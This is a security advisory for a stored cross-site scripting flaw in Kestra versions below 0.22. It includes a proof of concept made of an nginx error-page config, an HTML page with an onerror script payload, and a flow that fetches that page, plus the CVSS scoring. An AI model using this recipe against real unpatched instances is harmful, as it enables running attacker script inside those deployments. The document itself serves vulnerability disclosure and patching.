Skip to content

Stored XSS in Kestra below 0.22

Moderate
tchiotludo published GHSA-qpj4-4r6r-wvf4 Jul 7, 2025

Package

kestra

Affected versions

< 0.22

Patched versions

0.22.0

Description

Summary

Error message in execution "Overview" tab is vulnerable to stored XSS due to improper handling of HTTP response received

PoC

  1. Host the web server that will return the response with any error code and contain the JS payload in response, sample configuration:

nginx config

server {
    listen 80;
    server_name your.domain.com;

    location / {
        return 504;
    }

    error_page 504 /504_custom.html;

    location = /504_custom.html {
        root /var/www/html;
        internal;
    }
}

/var/www/html/504_custom.html

<!DOCTYPE html>
<html>
<head>
    <title>504 Gateway Timeout</title>
</head>
<body>
    <h1>504 Gateway Timeout</h1>
    <img src='#' onerror=alert(location.host) />
</body>
</html>
  1. Create sample flow that will proceed with http request on this endpoint
id: test_xss
namespace: test.test

tasks:
  - id: hello
    type: io.kestra.plugin.core.http.Request
    uri: http://TARGET_PAGE/
  1. Execute the flow, as soon as the execution finishes with error, please navigate to the “Overview” page of the current execution
  2. It will render the response from the page and also executes the JavaScript code in the context of current Kestra instance

Impact

The execution of custom JS code will result in compromise of OSS instance of Kestra

Severity

Moderate

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Local
Attack complexity
Low
Privileges required
High
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N

CVE ID

CVE-2025-53543

Weaknesses

Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)

The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes special characters such as <, >, and & that could be interpreted as web-scripting elements when they are sent to a downstream component that processes web pages. Learn more on MITRE.

Credits